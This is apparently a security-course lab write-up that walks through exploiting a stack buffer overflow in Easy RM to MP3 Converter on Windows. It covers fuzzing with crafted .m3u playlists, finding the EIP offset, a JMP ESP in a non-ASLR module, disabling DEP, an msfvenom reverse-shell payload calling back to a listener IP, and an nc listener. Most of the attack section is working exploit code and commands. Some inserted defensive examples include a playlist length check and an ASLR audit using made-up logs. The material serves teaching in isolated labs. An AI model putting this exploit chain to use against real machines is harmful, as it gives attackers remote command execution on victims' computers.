ED 318: Exploiting Easy RM to MP3 Converter on Windows with ASLR (30 pts)

Purpose

Learn how to exploit a simple buffer overflow vulnerability to gain Remote Code Execution on Windows, defeating Address Space Layout Randomization.

We will use these tools:

What You Need

WARNING

This application is unsafe to run. The Windows machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your Windows machine.

Installing the Vulnerable Application

On your Windows machine, in Firefox, go to

http://www.exploit-db.com/exploits/10374/

Click the icon to the right of the label "Vulnerable App", as shown below. If that link doesn't work, try this alternative download link.

The software downloads, with a long name starting with 707. Install the software with its default options. The program launches, as shown below.

After a few seconds, a "Preferences" box appears, as shown below.

Click OK.

Fuzzing: Length 10,000

We'll make a fuzzer that creates an attack file.

On your Linux machine, in a Terminal window, execute this command:

nano ezm-fuzz1
#!/usr/bin/python
# Python 2 script: print adds a trailing newline, so the file is 10001 bytes
attack = 'A' * 10000
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Linux, in a Terminal window, execute this command:

chmod a+x ezm-fuzz1
In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz1.m3u:
./ezm-fuzz1 > ezm-fuzz1.m3u
In the Terminal window, execute this command to see the files you just created (note: the command is ls -l ezm*, all lowercase; the character after the dash is the letter l, not the numeral 1):
ls -l ezm*
You should see a file named ezm-fuzz1.m3u with a size of 10001, as shown below:

In the Terminal window, execute this command to see the attack file:

nano ezm-fuzz1.m3u
The file contains a long line of "A" characters, as shown below:

Press Ctrl+X to exit the nano editor.
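The file above is a playlist whose single entry is 10,000 bytes long. As an added defender-side example, not part of the original project, here is the check a playlist loader needs before copying an entry into a fixed-size buffer. It assumes Python 3 and treats anything longer than the 260-character Windows MAX_PATH as invalid, which rejects all three fuzz files while accepting a normal playlist.

```python
MAX_PATH = 260   # Windows path limit; a playlist entry is a path, so longer is never valid

class PlaylistError(ValueError):
    pass

def make_fuzz_file(length):
    """Constructed stand-in for ezm-fuzz1/2/3: one line of 'A's plus the
    newline that Python 2's print adds (10000 -> a 10001-byte file)."""
    return 'A' * length + '\n'

def load_m3u(text, max_entry=MAX_PATH):
    """Parse .m3u text into a list of entry paths. Lines starting with '#'
    are directives (#EXTM3U, #EXTINF) and are skipped. An entry longer than
    max_entry raises instead of being copied onward, which is the length
    check the converter's playlist loader lacked."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if len(line) > max_entry:
            raise PlaylistError(
                'line %d: entry of %d bytes exceeds %d' % (lineno, len(line), max_entry))
        entries.append(line)
    return entries

def is_safe(text):
    """True when every entry is within bounds, False otherwise."""
    try:
        load_m3u(text)
        return True
    except PlaylistError:
        return False

# Constructed sample playlist with two ordinary entries.
NORMAL = "#EXTM3U\n#EXTINF:123,Track one\nC:\\Music\\one.rm\nC:\\Music\\two.rm\n"

if __name__ == '__main__':
    print(load_m3u(NORMAL))                   # ['C:\\Music\\one.rm', 'C:\\Music\\two.rm']
    print(is_safe(make_fuzz_file(10000)))     # False
```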

Copying the File from Linux to Windows

In the Terminal window, execute these commands to make your Linux machine serve files over HTTP:
sudo apt update
sudo apt install apache2 -y
sudo service apache2 start
sudo cp ezm-fuzz1.m3u /var/www/html
ip a
Find your Linux machine's IP address, as highlighted in the image below:

On your Windows machine, in Firefox, open this URL, replacing the IP address with the IP address of your Linux server:

10.128.0.9/ezm-fuzz1.m3u
Save the file in your Downloads folder, as shown below.

Opening the Attack File: Length 10,000

On your Windows machine, in the "Easy RM to MP3 Converter" box, click Load.

In the Open box, in the "Look in" drop-down list box, select Downloads.

At the bottom, in the "Files of type" drop-down list box, select "Playlist Files".

Double-click the ezm-fuzz1.m3u file, as shown below:

An error message appears, as shown below:

The program did not crash. It's still processing instructions as the designer intended, so this attack failed.

In the error box, click OK.

The program now shows an "AAAAAAAAAAA" message, as shown below.

To get rid of that, close "Easy RM to MP3 Converter" and re-open it from the Start button.

Fuzzing: Lengths 20,000 and 30,000

In the Terminal window, execute these commands to copy your fuzzer twice:
cp ezm-fuzz1 ezm-fuzz2
cp ezm-fuzz1 ezm-fuzz3
In the Terminal window, execute this command to edit your ezm-fuzz2 file:
nano ezm-fuzz2
Change the length in the file from 10000 to 20000, as shown below:

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz2.m3u:

./ezm-fuzz2 > ezm-fuzz2.m3u
Repeat the steps above to modify ezm-fuzz3 to use a length of 30000, create an attack file named ezm-fuzz3.m3u, and copy it to your desktop.

In the Terminal window, execute this command:

ls -l ezm*
You should see three .m3u files, with lengths of 10001, 20001, and 30001, as shown below:

As you did before, transfer the files to your Windows machine.

Opening the Attack File: Length 20,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz2.m3u file.

The same error message appears, as shown below:

Once again, the program did not crash.

Close the error message. Close "Easy RM to MP3 Converter". Launch "Easy RM to MP3 Converter" again from the Start button.

If a box pops up warning you that this is a trial version, close it.

Opening the Attack File: Length 30,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

Now it crashes, with the message "Easy RM to MP3 Converter has stopped working". The details say "APPCRASH", as shown below:

This is more promising--the application encountered an error it could not handle.

In the error message, click "Close the program".

Observing the Crash in the Immunity Debugger

You should have Immunity and Mona installed from a previous project.

Launch Immunity with Administrator privileges.

In Immunity, click File, Open.

Navigate to

C:\Program Files (x86)\Easy RM to MP3 Converter\RM2MP3Converter.exe
When the panes fill with text, click the magenta Run button. Click the Run button again.

"Easy RM to MP3 Converter" opens in Immunity, as shown below. It may not pop to the front--you may have to click its icon on the Taskbar.

In "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

In Immunity, at the bottom left, you see "Access violation when executing [41414141]", as shown below.

This is what we needed--a classic buffer overflow. Some of the "A" characters ended up in the EIP, as the address of the next instruction to be executed, so we have a way to take control of the computer.

Restarting Immunity and "Easy RM to MP3 Converter"

From the Immunity menu bar, click Debug, Restart. Click Yes. Click the magenta Run button. Click the Run button again.

Creating a Nonrepeating Pattern of Characters

On your Linux machine, in a Terminal window, execute this command:
nano findeip
In the nano window, type or paste this code.
#!/usr/bin/python
# Python 2 script: 20000 'A' characters, then 10000 bytes of a nonrepeating
# pattern. Each 4-byte entry is a letter for the thousands digit of the
# counter ('0' -> 'A' ... '9' -> 'J') followed by its last three digits,
# so 16080 becomes "G080".

chars = 'A' * 20000
for i in range(10000,20000,4):
   s = str(i)
   c = chr(int(s[1]) + 65) + s[2:]   # '6' -> 'G', then "080"
   chars += c
print chars

Save the file with Ctrl+X, Y, Enter.

Execute these commands to make the file executable and run it:

chmod a+x findeip
./findeip
The end of the output is shown below. After the 20,000 "A" characters, the output is a series of four-byte markers counting upward by fours: a letter for each group of 1,000 bytes, followed by three digits giving the position within that group, so each marker records the count of bytes up to that location.

For example, the highlighted string below is J860, indicating that there are nine groups of 1000 bytes before this (the letters A through I) and 860 bytes in this group to the left of that number.

Execute these commands to run findeip, placing the output into a file named findeip.m3u, and copy it to the home directory for your Apache web server:

./findeip > findeip.m3u
sudo cp *.m3u /var/www/html
On your Windows machine, in Firefox, download the findeip.m3u file and open it in "Easy RM to MP3 Converter", as you did before.

In Immunity, at the bottom left, you see "Access violation when executing [47303830]", as shown below.

You may see a different value if you are using a different Windows version. If so, adjust the prefix length in the code below to match the EIP offset on your target system.

Counting the Characters

At the crash, EIP contained 47303830. Read as little-endian bytes (30 38 30 47), that is the string "080G".

The number of bytes up to this point is:

20000 -- bytes before the nonrepeating pattern
 6000 -- the thousands labelled "A", "B", "C", "D", "E", and "F"
   80 -- bytes before the string "G080"
    1 -- the "G" in "G080" precedes the eip
-----
26081 -- total: the offset of the EIP overwrite, used as the prefix length below
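Here is the same count carried out in code, as an added example that is not part of the original project. It regenerates the findeip pattern, turns the value Immunity shows in EIP into the four bytes as they sat in the file, and locates them in the pattern; it generalizes the hand count to any EIP value taken from this pattern. It assumes Python 3 and the 20,000-byte "A" prefix used above.

```python
import struct

PREFIX_LEN = 20000   # the 'A' run that precedes the pattern in findeip

def build_pattern():
    """Regenerate findeip's output: 20000 'A's, then one 4-byte entry per
    counter value 10000..19996 step 4: a letter for the thousands digit
    ('0' -> 'A' ... '9' -> 'J') and the last three digits, e.g. 16080 -> 'G080'."""
    chars = []
    for i in range(10000, 20000, 4):
        s = str(i)
        chars.append(chr(int(s[1]) + 65) + s[2:])
    return 'A' * PREFIX_LEN + ''.join(chars)

def eip_to_text(eip_hex):
    """Immunity prints EIP as a little-endian dword, so '47303830' was the
    bytes 30 38 30 47 in the file, i.e. '080G'."""
    return struct.pack('<I', int(eip_hex, 16)).decode('latin-1')

def offset_by_counting(digits, letter):
    """The hand count from the text, for an EIP text of the form <digits><letter>:
    prefix + 1000 per earlier letter group + position in the group + 1 for the
    letter that precedes the overwritten bytes."""
    return PREFIX_LEN + (ord(letter) - ord('A')) * 1000 + int(digits) + 1

def find_offset(eip_hex, pattern=None):
    """Generalization: locate any 4-byte EIP text in the pattern. Returns None
    when the crash value carries no position (e.g. 41414141 from the 'A' prefix)."""
    pattern = build_pattern() if pattern is None else pattern
    text = eip_to_text(eip_hex)
    if text == 'AAAA':
        return None
    pos = pattern.find(text)
    return pos if pos >= 0 else None

if __name__ == '__main__':
    print(eip_to_text('47303830'))            # 080G
    print(offset_by_counting('080', 'G'))     # 26081
    print(find_offset('47303830'))            # 26081, the same answer
    print(find_offset('41414141'))            # None
```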

Targeting the EIP Precisely

Let's make sure we can hit the EIP.

On your Linux machine, in a Terminal window, execute this command:

nano hiteip
In the nano window, type or paste this code.
#!/usr/bin/python

prefix = 'A' * 26081                        # offset to the EIP overwrite, from the count above
eip = 'BCDE'                                # should show up in EIP as 45444342 (little-endian)
padding = 'F' * (30000 - len(prefix) - 4)   # keep the file 30000 bytes long
attack = prefix + eip + padding
print attack

Save the file with Ctrl+X, Y, Enter.

Execute these commands to create the hiteip.m3u file, and copy it to the home directory for your Apache web server:

chmod +x hiteip
./hiteip > hiteip.m3u
sudo cp *.m3u /var/www/html
On your Windows machine, in Firefox, download the hiteip.m3u file.

In Immunity, restart "Easy RM to MP3 Converter" and open the hiteip.m3u file.

In Immunity, at the bottom left, you see "Access violation when executing [45444342]", as shown below. This is the desired string "BCDE" -- we now control the eip!

Examining Memory at ESP

Let's see what ended up at the location pointed to by ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text.

But are there 'F' characters before ESP? To find out, scroll the lower left pane up one row.

Now you can see that there are only four 'F' characters before the ESP, as shown below.

So we can put our shellcode immediately after the first 4 'F' characters.

Listing Modules with Mona

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona modules
Scroll to the start of the list, as shown below.


ED 318.1: Size of MSVCP60.dll Module (15 pts)

The flag is the size of the MSVCP60.dll module, covered by a blue rectangle in the image above.

Finding a Module that Doesn't Move

We need a module that doesn't change its address each time the program is launched.

The best thing would be to find one with ASLR=False and Rebase=False, but the only module like that is RM2MP3Converter.exe. However, we can't use that module, because its addresses contain a null byte.

So the next thing to try is to see if a module with Rebase=True and ASLR=False doesn't move in practice, even though it could, in principle, be rebased.

I saved logs from three runs of Immunity, and kept only the modules with ASLR=False.

Here are my results:

Look at the "Base" address. The first item, "MSRMfilter03.dll", doesn't move!
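Here is the same three-run comparison done in code, as an added example that is not part of the original project and not Mona's own tooling. The three logs are constructed to mimic the column layout of !mona modules (Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [name] (path)); apart from the module names the page mentions, the names, addresses and versions in them are made up. For every module loaded without ASLR it reports whether the base really stayed put across runs and whether every address in it carries a null byte, which is the audit a defender runs to find what undermines ASLR for the process.

```python
import re

# Constructed logs in the column layout of "!mona modules", one string per run:
# Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [name] (path)
# Only MSRMfilter03.dll and RM2MP3Converter.exe are named on the page; every
# address, version and the other module names are made up for this example.
RUN_LOGS = [
    r"""0x10000000 | 0x1001b000 | 0x0001b000 | True  | False | False | False | False | 0.0.0.0 [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0x00400000 | 0x00461000 | 0x00061000 | False | False | False | False | False | 0.0.0.0 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0x03f40000 | 0x03f62000 | 0x00022000 | True  | False | False | False | False | 0.0.0.0 [examplecodec.dll] (C:\Program Files\Easy RM to MP3 Converter\examplecodec.dll)
0x77c10000 | 0x77c68000 | 0x00058000 | True  | True  | True  | True  | True  | 0.0.0.0 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)""",
    r"""0x10000000 | 0x1001b000 | 0x0001b000 | True  | False | False | False | False | 0.0.0.0 [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0x00400000 | 0x00461000 | 0x00061000 | False | False | False | False | False | 0.0.0.0 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0x03f70000 | 0x03f92000 | 0x00022000 | True  | False | False | False | False | 0.0.0.0 [examplecodec.dll] (C:\Program Files\Easy RM to MP3 Converter\examplecodec.dll)
0x76a30000 | 0x76a88000 | 0x00058000 | True  | True  | True  | True  | True  | 0.0.0.0 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)""",
    r"""0x10000000 | 0x1001b000 | 0x0001b000 | True  | False | False | False | False | 0.0.0.0 [MSRMfilter03.dll] (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
0x00400000 | 0x00461000 | 0x00061000 | False | False | False | False | False | 0.0.0.0 [RM2MP3Converter.exe] (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)
0x03f40000 | 0x03f62000 | 0x00022000 | True  | False | False | False | False | 0.0.0.0 [examplecodec.dll] (C:\Program Files\Easy RM to MP3 Converter\examplecodec.dll)
0x77810000 | 0x77868000 | 0x00058000 | True  | True  | True  | True  | True  | 0.0.0.0 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)""",
]

def parse_modules(log):
    """Map module name -> (base address, ASLR flag) for each table row of one run."""
    mods = {}
    for line in log.splitlines():
        cols = [c.strip() for c in line.split('|')]
        if len(cols) < 9 or not cols[0].startswith('0x'):
            continue
        name = re.search(r'\[([^\]]+)\]', cols[8])
        if name:
            mods[name.group(1)] = (int(cols[0], 16), cols[5] == 'True')
    return mods

def audit_no_aslr(logs):
    """Verdict for every module loaded with ASLR=False, judged across all runs."""
    runs = [parse_modules(log) for log in logs]
    verdicts = {}
    for name, (_, aslr) in runs[0].items():
        if aslr:
            continue                    # ASLR=True: the OS moves it, nothing to report
        bases = {run[name][0] for run in runs if name in run}
        if len(bases) > 1:
            verdicts[name] = 'no ASLR flag, but the base moved between runs'
        elif (bases.pop() >> 24) == 0:  # top byte 0x00 (module under 16 MB, so it holds throughout)
            verdicts[name] = 'fixed base, but every address in it has a leading null byte'
        else:
            verdicts[name] = 'fixed base with null-free addresses: relink with /DYNAMICBASE'
    return verdicts

if __name__ == '__main__':
    for module, verdict in audit_no_aslr(RUN_LOGS).items():
        print('%-22s %s' % (module, verdict))
```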

Finding a JMP ESP

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona jmp -r esp -m MSRMfilter03.dll

There is one useful address, as shown below:

0x1001b058

Restarting Immunity and "Easy RM to MP3 Converter"

Close Immunity.

Launch Immunity with Administrator privileges.

In Immunity, click File. In the lower section, click item 1: "C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe".

Click the Run button.

Testing Code Execution

Let's make sure we can run the code at the location we plan to inject into EIP.

Instead of real shellcode, we'll use a 16-byte NOP sled followed by an INT 3 ('\xCC').

If the code executes properly, it will slide down the NOP sled and halt at the INT 3.

On your Linux machine, in a Terminal window, execute this command:

nano ezm-eip4
In the nano window, type or paste this code:
#!/usr/bin/python

prefix = 'A' * 26081
eip = '\x58\xb0\x01\x10'         # 0x1001b058, the JMP ESP in MSRMfilter03.dll, little-endian
skip4 = 'FFFF'                   # the four bytes that sit before ESP
nopsled = '\x90' * 16
int3 = '\xCC'                    # breakpoint: Immunity stops here if the sled executed
padding = 'F' * (30000 - len(prefix) - 4 - 4 - 16 - 1)   # keep the file 30000 bytes long
attack = prefix + eip + skip4 + nopsled + int3 + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-eip4

./ezm-eip4 > ezm-eip4.m3u

cp ezm-eip4.m3u ~/Desktop
Transfer the ezm-eip4.m3u file to your Windows machine and open it in "Easy RM to MP3 Converter".

The lower left corner of the Immunity window now says "INT3 command", as shown below.

Troubleshooting

If execution stops at a NOP, you have Data Execution Prevention turned on.

To turn it off, open Computer Properties.

In the next window, on the left side, click "Advanced system settings".

On the Advanced tab, in the Performance section, click Settings.

In "Performance Options", on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only".

Click OK.

Click OK.

Restart your Windows server.

In the upper left pane of Immunity, scroll up to see the NOP sled, followed by the INT3.

Immunity misinterpreted the first few bytes of the NOP sled, but that doesn't matter--the NOP sled executed.

Everything worked correctly--we are executing code we injected!

Closing Immunity

Close Immunity.

Avoiding Bad Characters

Notice that we have a lot of space to put exploit code--several thousand bytes.

In a case like this, we can use a very simple exploit encoding, restricting the encoded output to alphanumeric characters, thus avoiding concerns about bad characters.

Finding your Machine's IP Address

On your Linux machine, in a Terminal window, execute this command.
ifconfig
Find your machine's IP address and make a note of it.

Generating Exploit Code

On your Linux machine, in a Terminal window, execute the command below.

Replace the IP address with the IP address of your Linux machine.

sudo msfvenom -p windows/shell_reverse_tcp LHOST="10.128.0.9" LPORT=443 EXITFUNC=thread -e x86/alpha_mixed -f python > ezm-attack2

This command makes an exploit that will connect from the Windows target back to the Linux attacker on port 443 and execute commands from Linux.

The exploit is output directly into a file named "ezm-attack2" because it's too long to see all at once in a Terminal window.

Completing the Attack Code

On your Linux machine, in a Terminal window, execute the command below.

nano ezm-attack2
The exploit code appears, as shown below.

Add these lines to the start of the file, as shown below:

#!/usr/bin/python

prefix = 'A' * 26081
eip = '\x58\xb0\x01\x10'
skip4 = 'FFFF'
nopsled = '\x90' * 16

Scroll to the bottom of the file.

Add these lines at the bottom, as shown below (buf is the variable defined by the msfvenom output above them):

padding = 'F' * (30000 - len(prefix) - 4 - 4 - 16 - len(buf))
attack = prefix + eip + skip4 + nopsled + buf + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-attack2
./ezm-attack2 > ezm-attack2.m3u
Transfer the ezm-attack2.m3u file to your Windows machine.

Starting a Listener

On your Linux machine, in a Terminal window, execute this command:
sudo apt install netcat -y
sudo nc -nlvp 443

Open "Easy RM to MP3 Converter" from the Start button. You don't need to use Immunity.

In "Easy RM to MP3 Converter", open the ezm-attack2.m3u file.

You should see a Windows command prompt in Linux--now you own the Windows box!


ED 318.2: Tasklist (15 pts.)

Execute this command:
tasklist | findstr MP
The flag is the output covered by a green box in the image below.


Sources

Exploit writing tutorial part 1 : Stack Based Overflows

http://www.exploit-db.com/exploits/10374/

Alphanumeric Shellcode


Posted 7-1-14 7:38 am by Sam Bowne
Revised 8:24 am with better way to find JMP ESP (ty @corelanc0d3r)
Revised 9:25 am; now working with ASLR thanks to @corelanc0d3r!
Revised for use at CCSF and tested on 2 and Win Server 2008 9-27-15
Off-by-10 "Troubleshooting" tip added 4-6-17
DEP tip added 4-7-17
Image showing Windows 2008 offset added 3-24-18
Flag ED 318.1 labelled correctly
Point total fixed 11-25-19